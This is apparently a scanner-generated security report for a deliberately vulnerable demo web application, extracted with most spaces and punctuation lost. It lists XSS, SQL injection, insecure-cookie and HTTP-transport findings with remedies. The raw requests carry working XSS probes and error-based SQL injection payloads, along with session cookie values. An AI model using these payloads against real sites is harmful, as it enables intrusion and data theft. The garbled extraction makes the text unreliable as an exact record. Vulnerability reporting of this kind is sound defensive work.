PermanentXSSallowsanattackertoexecutedynamicscripts(JavaScript VBScript)inthecontextoftheapplicationThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbytheuserhasbeeninterpretedbyHTMLJavaScriptVBScriptwithinthebrowser
PermanentmeansthattheattackwillbestoredinthebackendsystemInnormalXSSattacksanattackerneedstoe-mailthevictimbutinapermanentXSSanattackercanjustexecutetheattackandwaitforuserstoseetheaffectedpageAssoonassomeonevisitsthepagetheattackersstoredpayloadwillgetexecuted
XSStargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitonlyallowsattackerstohijackotheruserssessionstheattackermightattackanadministratortogainfullcontrolovertheapplication
ImpactPermanentXSSisadangerousissuethathasmanyexploitationvectorssomeofwhichinclude
Userssession-sensitiveinformationsuchascookiescanbestolenXSScanenableclient-sidewormswhichcouldmodifydeleteorstealotherusersdatawithintheapplicationThewebsitecanberedirectedtoanewlocationdefacedorusedasaphishingsite
RemedyTheissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisallinputandoutputfromtheapplicationshouldbefilteredOutputshouldbefilteredaccordingtotheoutputformatandlocationTypicallytheoutputlocationisHTMLWheretheoutputisHTMLensureallactivecontentisremovedpriortoitspresentationtotheserver
Priortosanitizinguserinputensureyouhaveapre-definedlistofbothexpectedandacceptablecharacterswithwhichyoupopulateawhitelistThislistneedsonlybedefinedonceandshouldbeusedtosanitizeandvalidateallsubsequentinput
Thereareanumberofpre-definedwellstructuredwhitelistlibrariesavailableformanydifferentenvironmentsgoodexamplesoftheseincludetheOWASPReformandMicrosoftAnticross-sitescriptinglibraries
Remedy References[ASPNET]-MicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheetOWASPAntiSamyJava
External ReferencesXSSCheatSheetOWASP-Cross-siteScriptingXSSShellXSSTunnelling
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
41 Supercar3 CONFIRMEDhttphackyourselffirsttroyhuntcomSupercar3
Injection URLhttphackyourselffirsttroyhuntcomapivote
18 57
Injection RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 77Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=223e3cnet+sparker3dnetsparker(0x00043F)3e
Identification RequestGET Supercar3 HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
Injection ResponseHTTP11 201 CreatedCache-Control no-cacheDate Mon 25 Aug 2014 232053 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 0Expires -1
Identification Responsehellip1))ANDISNULL(ASCII(SUBSTRING(CAST((SELECTversion)ASvarchar(8000))11))0)=1lttdgtlttrgtlttrgtlttdgtTroy Huntlttdgtlttdgtgtltnet sparker=netsparker(0x00043F)gtlttdgtlttrgtlttrgtlttdgtTroy Huntlttdgtlttdgt-1OR1=1)ANDISNULL(ASCII(SUBSTRING(CAST((SELECTversion)ASvarchar(8000)hellip
19 57
1 TOTALIMPORTANT
CONFIRMED
1
5 Password Transmitted over HTTPNetsparkerdetectedthatpassworddataisbeingtransmittedoverHTTP
ImpactIfanattackercaninterceptnetworktrafficheshecanstealuserscredentials
Actions to Take1 Seetheremedyforsolution2 MoveallofyourcriticalformsandpagestoHTTPSanddonotservethemoverHTTP
RemedyAllsensitivedatashouldbetransferredoverHTTPSratherthanHTTPFormsshouldbeservedoverHTTPSAllaspectsoftheapplicationthatacceptuserinputstartingfromtheloginprocessshouldonlybeservedoverHTTPS
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-319CAPEC-65WASC-04
51 AccountRegister CONFIRMEDhttphackyourselffirsttroyhuntcomAccountRegister
Form target actionhttphackyourselffirsttroyhuntcomAccountRegister
RequestGET AccountRegister HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228 ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 225838 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2265Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtRegister - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligt
hellip
20 57
1 TOTALIMPORTANT
CONFIRMED
1
6 Cookie Not Marked as SecureNetsparkeridentifiedacookienotmarkedassecureandtransmittedoverHTTPS
Thismeansthecookiecouldpotentiallybestolenbyanattackerwhocansuccessfullyinterceptanddecryptthetrafficorfollowingasuccessfulman-in-the-middleattack
ImpactThiscookiewillbetransmittedoveraHTTPconnectionthereforeifthiscookieisimportant(such as a session cookie)anattackermightinterceptitandhijackavictimssessionIftheattackercancarryoutaman-in-the-middleattackheshecanforcethevictimtomakeanHTTPrequesttostealthecookie
Actions to Take1 Seetheremedyforsolution2 Markallcookiesusedwithintheapplicationassecure(If the cookie is not related to authentication or does not carry any personal
information you do not have to mark it as secure)
RemedyMarkallcookiesusedwithintheapplicationassecure
Required Skills for Successful ExploitationToexploitthisissuetheattackerneedstobeabletointercepttrafficThisgenerallyrequireslocalaccesstothewebserverortothevictimsnetworkAttackersneedtobeunderstandlayer2havephysicalaccesstosystemseitheraswaypointsforthetrafficorhavelocallygainedaccesstotoasystembetweenthevictimandthewebserver
External ReferencesNETCookieSecurePropertyHowtoCreateTotallySecureCookies
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-614CAPEC-102WASC-15
61 AccountLogin CONFIRMEDhttpshackyourselffirsttroyhuntcomAccountLogin
Identified CookieAuthCookie
RequestPOST AccountLogin HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccountLoginAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=EA9A3D322DD4B030B3239FA3119364226C4AFC1146DACC18C04B897769A79F835F0F451B34A8B312CD8F5A77E3B5421B58074E3E4C68E5FA779CCC709E259C828EFF4936F4BB152D308EA778C82324B3CAF1BA60C0C18C134AEB7C5A5153AF181C536B617EF3F6DFB1052DDB94CFEB3F91DCFE08967136E4266A5E8249781E2F ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 57Content-Type applicationx-www-form-urlencoded
Email=netsparker40examplecomampPassword=3ampRememberMe=true
21 57
ResponseHTTP11 302 FoundCache-Control privateDate Mon 25 Aug 2014 225900 GMTLocation httphackyourselffirsttroyhuntcomServer Microsoft-IIS80Set-CookieAuthCookie=83F87081CDBC4CAC96FBBA3C773F139F952893E2A76E1B1AD3A6E8C32B935F9A14A7467ADD80BBC637E096BB698E00D1E437A060334677EA4A758738F5F619C1C59687F889818B80FF72D699D7B9FEA6F2F89F33E2A38DABBD39EEE2F5538787A104A63D8131741D813003A6B1E980EF52692C81A2395EB8B18B21613B890AF7 expires=Tue 25-Aug-2015 225900 GMT path=Password=Mw== expires=Tue 25-Aug-2015 225900 GMT path=Email=netsparkerexamplecom expires=Tue 25-Aug-2015 225900 GMT path=
X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 155Content-Type texthtml charset=utf-8
lthtmlgtltheadgtlttitlegtObject movedlttitlegtltheadgtltbodygtlth2gtObject moved to lta href=httphackyourselffirsttroyhuntcomgthereltagtlth2gtltbodygtlthtmlgt
22 57
1 TOTALIMPORTANT
7 Out-of-date Version (Microsoft SQL Server)Netsparkeridentifiedyouareusinganout-of-dateversionofMicrosoftSQL
ImpactSincethisisanoldversionofthesoftwareitmaybevulnerabletoattacks
RemedyPleaseupgradeyourinstallationofMicrosoftSQLServertothelateststableversion
ClassificationOWASP2010-A6OWASP2013-A9PCIV20-61PCIV30-61CAPEC-310
71 Make1httphackyourselffirsttroyhuntcomMake1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
Identified Version110922217
Latest Version12002000
Vulnerability DatabaseResult is based on 18082014 vulnerability database content
Certainty
RequestGET Make1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
23 57
ResponseHTTP11 500 Internal Server ErrorCache-Control privateDate Mon 25 Aug 2014 225955 GMTServer Microsoft-IIS80X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack p font-familyVerdanafont-weightnormalcolorblackmargin-top -5pxb font-familyVerdanafont-weightboldcolorblackmargin-top -5pxH1 font-familyVerdanafont-weightnormalfont-size18ptcolorred H2 font-familyVerdanafont-weightnormalfont-size14ptcolormaroon pre font-familyConsolasLucida ConsoleMonospacefont-size11ptmargin0padding05emline-height14ptmarker font-weight bold color blacktext-decoration noneversion color grayerror margin-bottom 10pxexpandable text-decorationunderline font-weightbold colornavy cursorhand media screen and (max-width 639px) pre width 440px overflow auto white-space pre-wrap word-wrap break-word media screen and (max-width 479px) pre width 280px ltstylegtltheadgt
ltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the execution of the current web request Please reviehellip
24 57
1 TOTALMEDIUM
CONFIRMED
1
8 Critical Form Served over HTTPNetsparkerdetectedthatacriticalformisservedoverHTTP
ImpactIfanattackercancarryoutaman-in-the-middleattackheshemaybeabletointercepttrafficbyinjectingJavaScriptcodeintothispageorchangingactionoftheHTTPcodetostealtheuserspasswordEventhoughthetargetpageisHTTPSthisdoesnotprotectthesystemagainstman-in-the-middleattacks
ThisissueisimportantasitnegatestheuseofSSLasaprivacyprotectionbarrier
Actions to Take1 Seetheremedyforsolution2 MoveallofyourcriticalformstoHTTPSanddonotallowthesepagestobeservedoverHTTP
RemedyAllsensitivedatashouldbetransferredoverHTTPSratherthanHTTPFormsshouldbeservedoverHTTPSAllaspectsoftheapplicationthatacceptuserinputstartingfromtheloginprocessshouldonlybeservedoverHTTPS
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-319CAPEC-65WASC-04
81 AccountLogin CONFIRMEDhttphackyourselffirsttroyhuntcomAccountLogin
Form target actionhttpshackyourselffirsttroyhuntcomAccountLogin
RequestGET AccountLogin HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228 ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
25 57
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 225838 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2549Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtLog in - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligtlthellip
26 57
3 TOTALMEDIUM
9 [Possible] Cross-site ScriptingNetsparkerdetectedpossiblecross-sitescriptingwhichallowsanattackertoexecuteadynamicscript(JavaScriptVBScript)inthecontextoftheapplication
ThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbyauserhasbeeninterpretedasHTMLJavaScriptVBScriptbythebrowserCross-sitescriptingtargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitallowsattackerstohijackotheruserssessionsanattackermightattackanadministratortogainfullcontrolovertheapplication
AlthoughNetsparkerbelievesthereisacross-sitescriptinginhereitcould not confirm itWestronglyrecommendinvestigatingtheissuemanuallytoensureitiscross-sitescriptingandneedstobeaddressed
ImpactTherearemanydifferentattacksthatcanbeleveragedthroughtheuseofXSSincluding
HijackingusersactivesessionChangingthelookofthepagewithinthevictimsbrowserMountingasuccessfulphishingattackInterceptingdataandperformingman-in-the-middleattacks
RemedyThisissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisallinputandoutputfromtheapplicationshouldbefilteredencodedOutputshouldbefilteredencodedaccordingtotheoutputformatandlocation
Thereareanumberofpre-definedwellstructuredwhitelistlibrariesavailableformanydifferentenvironmentsGoodexamplesoftheseincludeOWASPReformandMicrosoftAnticross-sitescriptinglibraries
Remedy References[ASPNET]-MicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheet
External ReferencesXSSCheatSheetOWASP-cross-sitescriptingXSSShellXSSTunnelling
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
91 apivotehttphackyourselffirsttroyhuntcomapivote
ParametersParameter Type Value
userId POST 1
supercarId POST 3
comments POST --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
27 57
RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 90Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=--gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
ResponseHTTP11 500 Internal Server ErrorCache-Control no-cacheDate Mon 25 Aug 2014 232047 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 2985Content-Type applicationjson charset=utf-8Expires -1
MessageAn error has occurredExceptionMessageUnclosed quotation mark after the character string --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)rnIncorrect syntax near --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)ExceptionTypeSystemDataSqlClientSqlExceptionStackTrace atSystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientSqlInternalConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientTdsParserThrowExceptionAndWarning(TdsParserStateObject stateObj Boolean callerHasConnectionLock Boolean asyncClose)rn atSystemDataSqlClientTdsParserTryRun(RunBehavior runBehavior SqlCommand cmdHandler SqlDataReader dataStream BulkCopySimpleResultSet bulkCopyHandlerTdsParserStateObject stateObj Booleanamp dataReady)rn at SystemDataSqlClientSqlCommandRunExecuteNonQueryTds(String methodName Boolean async Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandInternalExecuteNonQuery(TaskCompletionSource`1 completion String methodName Boolean sendToPipe Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandExecuteNonQuery()rn at WebControllersVoteControllerPost(Vote vote)rn at lambda_method(Closure Object Object[])rn at SystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorltgtc__DisplayClass10ltGetExecutorgtb__9(Object instance Object[] methodParameters)rn atSystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorExecute(Object instanchellip
92 apiadminhttphackyourselffirsttroyhuntcomapiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt
ParametersParameter Type Value
nsextt GET --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x0002E0)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
RequestGET apiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt3Enetsparker(0x0002E0)3CscRipt3E HTTP11Cache-Control no-cacheAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
28 57
RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 209Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=272b+(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns)+2b27
ResponsehellipPNETContent-Length 2867Content-Type applicationjson charset=utf-8Expires -1
MessageAn error has occurredExceptionMessageConversion failed when converting the varchar value _2dilemma to data typeintExceptionTypeSystemDataSqlClientSqlExceptionStackTrace at SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnectionAction`1 wraphellip
22 SupercarLeaderboard CONFIRMEDhttphackyourselffirsttroyhuntcomSupercarLeaderboardorderBy=(select+convert(int2cCHAR(95)2b
ParametersParameter Type Value
orderBy GET (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101)CHAR
asc GET false
Extracted Datamicrosoft sql azure (rtm) - 110922217 ltbrgt aug 20 2014 223756 ltbrgt copyright (c) microsoft corporationltbrgt
RequestGET SupercarLeaderboardorderBy=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns)ampasc=false HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept texthtmlapplicationxhtml+xmlapplicationxmlq=09imagewebpq=08Referer httphackyourselffirsttroyhuntcomSupercarLeaderboardAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
11 57
Responsehellip30319X-Powered-By ASPNETContent-Length 14292Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
